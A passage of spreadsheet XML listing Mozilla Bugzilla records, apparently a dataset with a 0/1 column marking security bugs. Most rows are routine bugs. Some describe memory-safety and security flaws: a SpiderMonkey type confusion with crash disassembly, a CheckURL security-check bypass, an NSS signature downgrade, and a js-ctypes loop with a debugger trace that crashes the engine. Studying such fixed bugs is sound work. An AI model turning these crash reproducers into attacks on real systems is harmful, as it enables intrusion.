      <c r="I51" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J51" t="inlineStr">
        <is>
          <t>DOM: Navigation</t>
        </is>
      </c>
      <c r="K51" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L51" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M51" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N51" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O51" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P51" t="inlineStr">
        <is>
          <t>[sg:moderate][advisory-tracking+]</t>
        </is>
      </c>
      <c r="Q51" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R51" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S51" t="inlineStr">
        <is>
          <t>mozilla14</t>
        </is>
      </c>
      <c r="T51" t="n">
        <v>1</v>
      </c>
      <c r="U51" t="n">
        <v>0</v>
      </c>
      <c r="V51" t="n">
        <v>21</v>
      </c>
      <c r="W51" t="inlineStr">
        <is>
          <t>Created attachment 587905
testcase
###!!! ASSERTION: Script global object not ready: '!mDocShell || GetDocument()-&gt;GetScriptGlobalObject()', file parser/html/nsHtml5TreeOpExecutor.h, line 157
###!!! ASSERTION: Uh, mDocument doesn't match the current inner window document!: '!GetCurrentInnerWindow() || GetCurrentInnerWindow()-&gt;GetExtantDocument() == mDocument', file dom/base/nsGlobalWindow.cpp, line 1877</t>
        </is>
      </c>
      <c r="X51" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="52">
      <c r="A52" t="n">
        <v>2193</v>
      </c>
      <c r="B52" t="inlineStr">
        <is>
          <t>1999-01-05 18:12:16 -0800</t>
        </is>
      </c>
      <c r="C52" t="inlineStr">
        <is>
          <t>[PP] Mac - Crash clicking in URL field</t>
        </is>
      </c>
      <c r="D52" t="inlineStr">
        <is>
          <t>2008-07-31 01:15:51 -0700</t>
        </is>
      </c>
      <c r="E52" t="n">
        <v>1</v>
      </c>
      <c r="F52" t="n">
        <v>1</v>
      </c>
      <c r="G52" t="n">
        <v>6</v>
      </c>
      <c r="H52" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I52" t="inlineStr">
        <is>
          <t>Core Graveyard</t>
        </is>
      </c>
      <c r="J52" t="inlineStr">
        <is>
          <t>Viewer App</t>
        </is>
      </c>
      <c r="K52" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L52" t="inlineStr">
        <is>
          <t>PowerPC</t>
        </is>
      </c>
      <c r="M52" t="inlineStr">
        <is>
          <t>Mac System 8.5</t>
        </is>
      </c>
      <c r="N52" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O52" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P52" t="inlineStr"/>
      <c r="Q52" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R52" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S52" t="inlineStr">
        <is>
          <t>M2</t>
        </is>
      </c>
      <c r="T52" t="n">
        <v>1</v>
      </c>
      <c r="U52" t="n">
        <v>0</v>
      </c>
      <c r="V52" t="n">
        <v>6</v>
      </c>
      <c r="W52" t="inlineStr">
        <is>
          <t>Jan 5 Mac PPC build of seamonkey
PPC G3 292 PBook, System 8.5
1.  Launch viewer.app in Jan 5 build
2.  Go to URL field and click into the field; if the app did not quit click a few
more times in the field.
• Adios!  App quits itself.  Might be a dupe of 2160 but since it does happen
with default page and in only a few mouse ops, thought I'd get it in to be sure.
Works fine on Jan 5 PC build.</t>
        </is>
      </c>
      <c r="X52" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="53">
      <c r="A53" t="n">
        <v>573822</v>
      </c>
      <c r="B53" t="inlineStr">
        <is>
          <t>2010-06-22 14:13:10 -0700</t>
        </is>
      </c>
      <c r="C53" t="inlineStr">
        <is>
          <t>[k] Implement Helpful/Not Helpful voting</t>
        </is>
      </c>
      <c r="D53" t="inlineStr">
        <is>
          <t>2011-04-07 09:58:12 -0700</t>
        </is>
      </c>
      <c r="E53" t="n">
        <v>1</v>
      </c>
      <c r="F53" t="n">
        <v>1</v>
      </c>
      <c r="G53" t="n">
        <v>5</v>
      </c>
      <c r="H53" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I53" t="inlineStr">
        <is>
          <t>support.mozilla.org</t>
        </is>
      </c>
      <c r="J53" t="inlineStr">
        <is>
          <t>Knowledge Base Software</t>
        </is>
      </c>
      <c r="K53" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L53" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M53" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N53" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O53" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P53" t="inlineStr"/>
      <c r="Q53" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R53" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S53" t="inlineStr">
        <is>
          <t>2.2</t>
        </is>
      </c>
      <c r="T53" t="n">
        <v>1</v>
      </c>
      <c r="U53" t="n">
        <v>0</v>
      </c>
      <c r="V53" t="n">
        <v>3</v>
      </c>
      <c r="W53" t="inlineStr">
        <is>
          <t>The votes probably need to be tracked like in bug 573072 ("I have this problem too").</t>
        </is>
      </c>
      <c r="X53" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="54">
      <c r="A54" t="n">
        <v>1568397</v>
      </c>
      <c r="B54" t="inlineStr">
        <is>
          <t>2019-07-23 19:18:50 -0700</t>
        </is>
      </c>
      <c r="C54" t="inlineStr">
        <is>
          <t>SpiderMonkey uninitialized memory leads to Type Confusion between "undefined" with any object</t>
        </is>
      </c>
      <c r="D54" t="inlineStr">
        <is>
          <t>2020-03-19 10:08:49 -0700</t>
        </is>
      </c>
      <c r="E54" t="n">
        <v>1</v>
      </c>
      <c r="F54" t="n">
        <v>1</v>
      </c>
      <c r="G54" t="n">
        <v>3</v>
      </c>
      <c r="H54" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I54" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J54" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K54" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L54" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M54" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N54" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O54" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P54" t="inlineStr">
        <is>
          <t>[adv-main69+][adv-esr68.1+][post-critsmash-triage]</t>
        </is>
      </c>
      <c r="Q54" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R54" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S54" t="inlineStr">
        <is>
          <t>mozilla70</t>
        </is>
      </c>
      <c r="T54" t="n">
        <v>1</v>
      </c>
      <c r="U54" t="n">
        <v>0</v>
      </c>
      <c r="V54" t="n">
        <v>28</v>
      </c>
      <c r="W54" t="inlineStr">
        <is>
          <t>Created attachment 9080221
poc.html
User Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36
Steps to reproduce:
1. open the html file with the latest firefox
2. firefox renderer process crash.
Actual results:
1. firefox will crash as type confusion happen between "undefined" and a normal object:
00000071`cb00f521 4c395908        cmp     qword ptr [rcx+8],r11 ds:00078000`00000008=????????????????
Expected results:
1. not crash</t>
        </is>
      </c>
      <c r="X54" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="55">
      <c r="A55" t="n">
        <v>63893</v>
      </c>
      <c r="B55" t="inlineStr">
        <is>
          <t>2000-12-28 15:31:42 -0800</t>
        </is>
      </c>
      <c r="C55" t="inlineStr">
        <is>
          <t>PSM crashes if FIPS-mode is enabled.</t>
        </is>
      </c>
      <c r="D55" t="inlineStr">
        <is>
          <t>2008-07-10 02:10:47 -0700</t>
        </is>
      </c>
      <c r="E55" t="n">
        <v>1</v>
      </c>
      <c r="F55" t="n">
        <v>1</v>
      </c>
      <c r="G55" t="n">
        <v>3</v>
      </c>
      <c r="H55" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I55" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J55" t="inlineStr">
        <is>
          <t>Security: PSM</t>
        </is>
      </c>
      <c r="K55" t="inlineStr">
        <is>
          <t>1.0 Branch</t>
        </is>
      </c>
      <c r="L55" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M55" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N55" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O55" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P55" t="inlineStr"/>
      <c r="Q55" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R55" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S55" t="inlineStr">
        <is>
          <t>psm2.0</t>
        </is>
      </c>
      <c r="T55" t="n">
        <v>1</v>
      </c>
      <c r="U55" t="n">
        <v>0</v>
      </c>
      <c r="V55" t="n">
        <v>9</v>
      </c>
      <c r="W55" t="inlineStr">
        <is>
          <t>PSM will crash if FIPS-mode (on the Advanced tab of the Personal Security
Manager) is enabled and then disabled.
To reproduce:
1) Go to the Modules section on the Advanced tab of the Personal Security
Manager dialog.
2) Click on the Enable button next to the "Enable FIPS-mode" text. The button
should now say Disable and the text say "Disable FIPS-mode".
3) Close the Personal Security Manager dialog.
4) psm.exe will crash in a couple of minutes.  Unfortunately since it is psm
crashing and not Mozilla, no Talkback incident is created.
In addition, if after step 2, but before psm.exe crashes, you click on the
Disable button, the button disapears and is replaced by the text: "Not
Implemented. The requested feature has not been implemented, or is not
functioning properly."
Tested with Mozilla 122805 on NT4.</t>
        </is>
      </c>
      <c r="X55" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="56">
      <c r="A56" t="n">
        <v>1458158</v>
      </c>
      <c r="B56" t="inlineStr">
        <is>
          <t>2018-04-30 21:59:45 -0700</t>
        </is>
      </c>
      <c r="C56" t="inlineStr">
        <is>
          <t>Bold font not rendering for Arabic characters when the style calls for Arial with font-weight:900</t>
        </is>
      </c>
      <c r="D56" t="inlineStr">
        <is>
          <t>2021-11-29 01:10:39 -0800</t>
        </is>
      </c>
      <c r="E56" t="n">
        <v>1</v>
      </c>
      <c r="F56" t="n">
        <v>1</v>
      </c>
      <c r="G56" t="n">
        <v>3</v>
      </c>
      <c r="H56" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I56" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J56" t="inlineStr">
        <is>
          <t>Layout: Text and Fonts</t>
        </is>
      </c>
      <c r="K56" t="inlineStr">
        <is>
          <t>61 Branch</t>
        </is>
      </c>
      <c r="L56" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M56" t="inlineStr">
        <is>
          <t>Windows 7</t>
        </is>
      </c>
      <c r="N56" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O56" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P56" t="inlineStr"/>
      <c r="Q56" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R56" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S56" t="inlineStr">
        <is>
          <t>mozilla61</t>
        </is>
      </c>
      <c r="T56" t="n">
        <v>1</v>
      </c>
      <c r="U56" t="n">
        <v>0</v>
      </c>
      <c r="V56" t="n">
        <v>24</v>
      </c>
      <c r="W56" t="inlineStr">
        <is>
          <t>Bold font not rendering for Arabic characters when the style calls for Arial with font-weight:900.
Testcase https://bugzilla.mozilla.org/attachment.cgi?id=598489</t>
        </is>
      </c>
      <c r="X56" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="57">
      <c r="A57" t="n">
        <v>1345642</v>
      </c>
      <c r="B57" t="inlineStr">
        <is>
          <t>2017-03-08 14:22:11 -0800</t>
        </is>
      </c>
      <c r="C57" t="inlineStr">
        <is>
          <t>Update headers to new UICollectionViewHeaders for AS</t>
        </is>
      </c>
      <c r="D57" t="inlineStr">
        <is>
          <t>2017-04-01 02:11:15 -0700</t>
        </is>
      </c>
      <c r="E57" t="n">
        <v>1</v>
      </c>
      <c r="F57" t="n">
        <v>1</v>
      </c>
      <c r="G57" t="n">
        <v>2</v>
      </c>
      <c r="H57" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I57" t="inlineStr">
        <is>
          <t>Firefox for iOS</t>
        </is>
      </c>
      <c r="J57" t="inlineStr">
        <is>
          <t>Home screen</t>
        </is>
      </c>
      <c r="K57" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L57" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="M57" t="inlineStr">
        <is>
          <t>iOS</t>
        </is>
      </c>
      <c r="N57" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O57" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P57" t="inlineStr">
        <is>
          <t>[mobileAS]</t>
        </is>
      </c>
      <c r="Q57" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R57" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S57" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T57" t="n">
        <v>1</v>
      </c>
      <c r="U57" t="n">
        <v>0</v>
      </c>
      <c r="V57" t="n">
        <v>2</v>
      </c>
      <c r="W57" t="inlineStr">
        <is>
          <t>The headers just like with everything else need to be updated for the new layout. 
You can look at the other bugs for context.</t>
        </is>
      </c>
      <c r="X57" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="58">
      <c r="A58" t="n">
        <v>1408135</v>
      </c>
      <c r="B58" t="inlineStr">
        <is>
          <t>2017-10-12 12:43:52 -0700</t>
        </is>
      </c>
      <c r="C58" t="inlineStr">
        <is>
          <t>Copy URL confirmation message should appear where user selects it</t>
        </is>
      </c>
      <c r="D58" t="inlineStr">
        <is>
          <t>2017-10-30 14:41:34 -0700</t>
        </is>
      </c>
      <c r="E58" t="n">
        <v>1</v>
      </c>
      <c r="F58" t="n">
        <v>1</v>
      </c>
      <c r="G58" t="n">
        <v>2</v>
      </c>
      <c r="H58" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I58" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J58" t="inlineStr">
        <is>
          <t>Address Bar</t>
        </is>
      </c>
      <c r="K58" t="inlineStr">
        <is>
          <t>58 Branch</t>
        </is>
      </c>
      <c r="L58" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M58" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N58" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O58" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P58" t="inlineStr">
        <is>
          <t>[reserve-photon-animation]</t>
        </is>
      </c>
      <c r="Q58" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R58" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S58" t="inlineStr">
        <is>
          <t>Firefox 58</t>
        </is>
      </c>
      <c r="T58" t="n">
        <v>1</v>
      </c>
      <c r="U58" t="n">
        <v>0</v>
      </c>
      <c r="V58" t="n">
        <v>6</v>
      </c>
      <c r="W58" t="inlineStr">
        <is>
          <t>Created attachment 8917972
copy url.mov
When the user selects "Copy URL" from the PAM menu and click on the Copy URL paperclip icon, the confirmation message appears in the same location. It should appear based on where the user selects it.
Current behavior:
Clicking on Copy URL from the PAM menu prompts the confirmation message to appear where the Copy URL (paperclip icon) is located
Expected:
Clicking on Copy URL from the PAM menu prompts the confirmation message to appear where the PAM menu is located. 
See video for reference</t>
        </is>
      </c>
      <c r="X58" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="59">
      <c r="A59" t="n">
        <v>94953</v>
      </c>
      <c r="B59" t="inlineStr">
        <is>
          <t>2001-08-12 03:19:31 -0700</t>
        </is>
      </c>
      <c r="C59" t="inlineStr">
        <is>
          <t>You can add fields to Bugzilla?</t>
        </is>
      </c>
      <c r="D59" t="inlineStr">
        <is>
          <t>2012-12-18 20:46:25 -0800</t>
        </is>
      </c>
      <c r="E59" t="n">
        <v>1</v>
      </c>
      <c r="F59" t="n">
        <v>1</v>
      </c>
      <c r="G59" t="n">
        <v>4</v>
      </c>
      <c r="H59" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I59" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J59" t="inlineStr">
        <is>
          <t>Documentation</t>
        </is>
      </c>
      <c r="K59" t="inlineStr">
        <is>
          <t>2.13</t>
        </is>
      </c>
      <c r="L59" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M59" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N59" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O59" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P59" t="inlineStr"/>
      <c r="Q59" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R59" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S59" t="inlineStr">
        <is>
          <t>Bugzilla 2.14</t>
        </is>
      </c>
      <c r="T59" t="n">
        <v>1</v>
      </c>
      <c r="U59" t="n">
        <v>0</v>
      </c>
      <c r="V59" t="n">
        <v>5</v>
      </c>
      <c r="W59" t="inlineStr">
        <is>
          <t>A.4.14.  Does Bugzilla allow fields to be added, changed or deleted? If I want
to customize the bug submission form to meet our needs, can I do that using our
terminology?
Yes.
-----------------------------
This is rather uninformative and potentially misleading.  It should say that you
need to hack the code.  I thought I read a comment elsewhere about something
similar where it did say this but I can't find it now.
Even better if it could include the recipe for how you modify the code to
support new fields.  There is some information on this in the newsgroup.</t>
        </is>
      </c>
      <c r="X59" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="60">
      <c r="A60" t="n">
        <v>770429</v>
      </c>
      <c r="B60" t="inlineStr">
        <is>
          <t>2012-07-03 00:22:28 -0700</t>
        </is>
      </c>
      <c r="C60" t="inlineStr">
        <is>
          <t>Bypassing security checks for nsLocation::CheckURL</t>
        </is>
      </c>
      <c r="D60" t="inlineStr">
        <is>
          <t>2013-01-10 21:22:20 -0800</t>
        </is>
      </c>
      <c r="E60" t="n">
        <v>1</v>
      </c>
      <c r="F60" t="n">
        <v>1</v>
      </c>
      <c r="G60" t="n">
        <v>3</v>
      </c>
      <c r="H60" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I60" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J60" t="inlineStr">
        <is>
          <t>Security</t>
        </is>
      </c>
      <c r="K60" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L60" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M60" t="inlineStr">
        <is>
          <t>Windows XP</t>
        </is>
      </c>
      <c r="N60" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O60" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P60" t="inlineStr">
        <is>
          <t>[advisory-tracking+]</t>
        </is>
      </c>
      <c r="Q60" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R60" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S60" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T60" t="n">
        <v>1</v>
      </c>
      <c r="U60" t="n">
        <v>0</v>
      </c>
      <c r="V60" t="n">
        <v>26</v>
      </c>
      <c r="W60" t="inlineStr">
        <is>
          <t>GetContextFromStack ignores JSContext for ContentFrameMessageManager.  If GetContextFromStack ends up not getting a JSContext, nsLocation::CheckURL does not do security checks.  This could allow content to load restricted URLs.</t>
        </is>
      </c>
      <c r="X60" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="61">
      <c r="A61" t="n">
        <v>1060599</v>
      </c>
      <c r="B61" t="inlineStr">
        <is>
          <t>2014-08-29 14:04:44 -0700</t>
        </is>
      </c>
      <c r="C61" t="inlineStr">
        <is>
          <t>Update tests have to modify the 'channel-prefs.js' file because the new signed builds on OS X</t>
        </is>
      </c>
      <c r="D61" t="inlineStr">
        <is>
          <t>2019-07-03 12:10:43 -0700</t>
        </is>
      </c>
      <c r="E61" t="n">
        <v>1</v>
      </c>
      <c r="F61" t="n">
        <v>1</v>
      </c>
      <c r="G61" t="n">
        <v>6</v>
      </c>
      <c r="H61" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I61" t="inlineStr">
        <is>
          <t>Mozilla QA Graveyard</t>
        </is>
      </c>
      <c r="J61" t="inlineStr">
        <is>
          <t>Mozmill Tests</t>
        </is>
      </c>
      <c r="K61" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L61" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M61" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N61" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O61" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P61" t="inlineStr">
        <is>
          <t>[status-mozilla-esr24: fixed]</t>
        </is>
      </c>
      <c r="Q61" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R61" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S61" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T61" t="n">
        <v>1</v>
      </c>
      <c r="U61" t="n">
        <v>0</v>
      </c>
      <c r="V61" t="n">
        <v>24</v>
      </c>
      <c r="W61" t="inlineStr">
        <is>
          <t>With bug 1047728 the app bundles on OS X will be signed with a new signing method Apple introduces with 10.9.5. As result the channel-prefs.js file, which we use for changing the update channel gets moved to Content/Resources on OS X. That means the steps for updates will change and we have to do the following:
1. Check the app bundle signature. For that I have filed https://github.com/mozilla/mozmill-automation/issues/163
2. Firefox has to be started once to clear the quarantine bit. Only with that done we can modify the channel-prefs.js file. Given that we can't return to Python yet in between restarts, the file has to be modified directly while Firefox is running. For that we can use "GreD", which has been modified to point to Content/Resources. For Windows and Linux we might have to find another constant.
Keep in mind that with the file being modified, we cannot check the signature again.
3. Perform the update steps as necessary (partial/full + optional fallback)
4. Revert the channel-prefs.js file
The above only covers the tests. For the update-channel.js modification changes on the Python side I filed https://github.com/mozilla/mozmill-automation/issues/164</t>
        </is>
      </c>
      <c r="X61" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="62">
      <c r="A62" t="n">
        <v>1552208</v>
      </c>
      <c r="B62" t="inlineStr">
        <is>
          <t>2019-05-16 08:32:35 -0700</t>
        </is>
      </c>
      <c r="C62" t="inlineStr">
        <is>
          <t>NSS client will sign CertificateVerify message with rsa_pkcs1_sha256 SignatureScheme in TLS 1.3</t>
        </is>
      </c>
      <c r="D62" t="inlineStr">
        <is>
          <t>2020-06-05 00:04:24 -0700</t>
        </is>
      </c>
      <c r="E62" t="n">
        <v>1</v>
      </c>
      <c r="F62" t="n">
        <v>1</v>
      </c>
      <c r="G62" t="n">
        <v>3</v>
      </c>
      <c r="H62" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I62" t="inlineStr">
        <is>
          <t>NSS</t>
        </is>
      </c>
      <c r="J62" t="inlineStr">
        <is>
          <t>Libraries</t>
        </is>
      </c>
      <c r="K62" t="inlineStr">
        <is>
          <t>3.43</t>
        </is>
      </c>
      <c r="L62" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M62" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N62" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O62" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P62" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][adv-main68+]</t>
        </is>
      </c>
      <c r="Q62" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R62" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S62" t="inlineStr">
        <is>
          <t>3.45</t>
        </is>
      </c>
      <c r="T62" t="n">
        <v>1</v>
      </c>
      <c r="U62" t="n">
        <v>0</v>
      </c>
      <c r="V62" t="n">
        <v>10</v>
      </c>
      <c r="W62" t="inlineStr">
        <is>
          <t>Created attachment 9065443
pacp-trace.tar.gz
It's possible to force NSS client to sign CertificateVerify with PKCS#1 v1.5 signatures when those are the only ones advertised by server in CertificateRequest.
tested with nss-4.34.0
packet capture with SSLKEYLOGFILE attached</t>
        </is>
      </c>
      <c r="X62" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="63">
      <c r="A63" t="n">
        <v>1155985</v>
      </c>
      <c r="B63" t="inlineStr">
        <is>
          <t>2015-04-18 09:57:27 -0700</t>
        </is>
      </c>
      <c r="C63" t="inlineStr">
        <is>
          <t>EXC_BAD_ACCESS in js`JS_GetClass(JSObject*) [inlined] JSObject::getClass(this=0x0000000104685200) const at jsobj.h:128</t>
        </is>
      </c>
      <c r="D63" t="inlineStr">
        <is>
          <t>2016-07-02 10:39:45 -0700</t>
        </is>
      </c>
      <c r="E63" t="n">
        <v>1</v>
      </c>
      <c r="F63" t="n">
        <v>1</v>
      </c>
      <c r="G63" t="n">
        <v>3</v>
      </c>
      <c r="H63" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I63" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J63" t="inlineStr">
        <is>
          <t>js-ctypes</t>
        </is>
      </c>
      <c r="K63" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L63" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M63" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N63" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O63" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P63" t="inlineStr">
        <is>
          <t>[adv-main39+]</t>
        </is>
      </c>
      <c r="Q63" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R63" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S63" t="inlineStr">
        <is>
          <t>mozilla40</t>
        </is>
      </c>
      <c r="T63" t="n">
        <v>1</v>
      </c>
      <c r="U63" t="n">
        <v>0</v>
      </c>
      <c r="V63" t="n">
        <v>22</v>
      </c>
      <c r="W63" t="inlineStr">
        <is>
          <t>Derived from bug 891107
happened on 64bit cgc build, on OS X.
Configure parameter: (compacting)
  --enable-optimize --enable-debug --enable-stdcxx-compat --enable-ctypes --disable-shared-js --enable-nspr-build
Environment variable:
  JS_GC_ZEAL=14
Code:
for (let i = 0; i &lt; 1000; i++) {
  let test_struct = ctypes.StructType("test_struct", [{ "x": ctypes.int32_t },
                                                      { "bar": ctypes.uint32_t }]);
  try {
    new test_struct("foo", "x");
  } catch (e) {
  }
}
Debug log:
(lldb) run  ~/Desktop/test.js
Process 91361 launched: '/Users/arai/projects/mozilla-central/obj-sm-cgc/dist/bin/js' (x86_64)
Process 91361 stopped
* thread #1: tid = 0x99497c, 0x0000000100712244 js`JS_GetClass(JSObject*) [inlined] JSObject::getClass(this=0x0000000104685200) const at jsobj.h:128, queue = 'com.apple.main-thread', stop reason = EXC_BAD_ACCESS (code=2, address=0x104685200)
    frame #0: 0x0000000100712244 js`JS_GetClass(JSObject*) [inlined] JSObject::getClass(this=0x0000000104685200) const at jsobj.h:128
   125 	    }
   126 	
   127 	    const js::Class* getClass() const {
-&gt; 128 	        return group_-&gt;clasp();
   129 	    }
   130 	    const JSClass* getJSClass() const {
   131 	        return Jsvalify(getClass());
(lldb) bt
* thread #1: tid = 0x99497c, 0x0000000100712244 js`JS_GetClass(JSObject*) [inlined] JSObject::getClass(this=0x0000000104685200) const at jsobj.h:128, queue = 'com.apple.main-thread', stop reason = EXC_BAD_ACCESS (code=2, address=0x104685200)
